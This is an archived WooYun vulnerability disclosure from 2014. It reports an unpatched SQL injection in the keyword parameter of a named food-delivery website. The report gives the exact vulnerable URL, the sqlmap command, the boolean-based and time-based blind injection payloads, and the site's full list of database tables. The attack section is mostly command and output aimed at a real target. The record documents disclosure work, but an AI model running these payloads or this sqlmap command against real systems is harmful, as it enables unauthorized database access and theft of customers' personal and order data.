WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --------------------------- http://drop.zone.ci/
2014-03-09: Details sent to the vendor, awaiting vendor handling. 2014-03-19: The vendor actively ignored the vulnerability; details disclosed to the public.
Dianwoba main site SQL injection can leak database contents. Verified with sqlmap (only the table names were retrieved as a demonstration; no further extraction was attempted). Please claim the vulnerability on WooYun and fix it promptly.
Vulnerability location: www.dianwoba.com/comment!getAllMicroblog.do?keyword=0&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091 . The keyword parameter is not filtered and can be injected directly with sqlmap.
C:\Users\Administrator>sqlmap.py -u "www.dianwoba.com/comment!getAllMicroblog.do?keyword=0&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091" -p keyword --tables
sqlmap identified the following injection points with a total of 71 HTTP(s) requests:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=0%' AND 7994=7994 AND '%'='&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: keyword=0%' AND SLEEP(5) AND '%'='&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0.11
Database: website
[104 tables]
+---------------------------------------+
| C3P0TestTable |
| a_lim_table1 |
| a_lim_table1_14_26 |
| a_table_cyk_all |
| a_table_sup |
| crm_address |
| crm_admin_operate_log |
| crm_after_sale |
| crm_b2bsups |
| crm_blacklist |
| crm_customer_service |
| crm_customer_service_status |
| crm_gps_gprs_message |
| crm_gps_gprs_order |
| crm_gps_gprs_order_bak |
| crm_mobile_city |
| crm_operation_log |
| crm_operation_log_bak |
| crm_operators |
| crm_order_his |
| crm_order_his_all |
| crm_peisong |
| crm_peisong_bak |
| crm_peisong_paiban |
| crm_peisongtuan |
| crm_peisongtuan_bak |
| crm_phone |
| crm_system_parameters |
| crm_viplist |
| crm_youhui_phone |
| g_building |
| g_item |
| g_item_type |
| g_market |
| g_queue_time |
| gps_whereru |
| w_coupon |
| w_coupon_user |
| wm_address |
| wm_address_express |
| wm_app_message |
| wm_app_message_copy |
| wm_app_message_copy1 |
| wm_app_phoneid |
| wm_app_tuisong |
| wm_bbs_rating_integral |
| wm_bbs_rating_level |
| wm_bbs_rating_type |
| wm_gorder |
| wm_gprs_printers |
| wm_gprsprint_order |
| wm_gprsprint_phoneno |
| wm_group |
| wm_group_department |
| wm_group_member |
| wm_group_operation_log |
| wm_images_sup |
| wm_integral |
| wm_ipforward |
| wm_joincity |
| wm_kuaike_member |
| wm_liansuo |
| wm_market_cj |
| wm_market_liansuo |
| wm_market_mail |
| wm_market_product |
| wm_market_product_prop |
| wm_market_property |
| wm_market_provider |
| wm_market_type |
| wm_market_type2 |
| wm_member |
| wm_member_consume |
| wm_member_day |
| wm_menu |
| wm_menu_class |
| wm_microblog_main |
| wm_microblog_reply |
| wm_money_application |
| wm_money_jftomoney |
| wm_money_record |
| wm_moneyuse_log |
| wm_notice |
| wm_order |
| wm_order_detail |
| wm_order_his |
| wm_order_id |
| wm_order_wcps20140209 |
| wm_pack_dic |
| wm_package_menu |
| wm_package_rule |
| wm_package_submenu |
| wm_pay_log |
| wm_prize |
| wm_prize_record |
| wm_shop_class |
| wm_sixin |
| wm_sixin_read |
| wm_sup_info |
| wm_supclass |
| wm_supplier |
| wm_supplier_favorite |
| wm_wuliu |
| wm_youhui |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Strengthen filtering of the parameter. Please claim the vulnerability on WooYun and fix it promptly.
Severity rating: no impact (vendor ignored)
Ignored at: 2014-03-19 12:26
Vendor response: none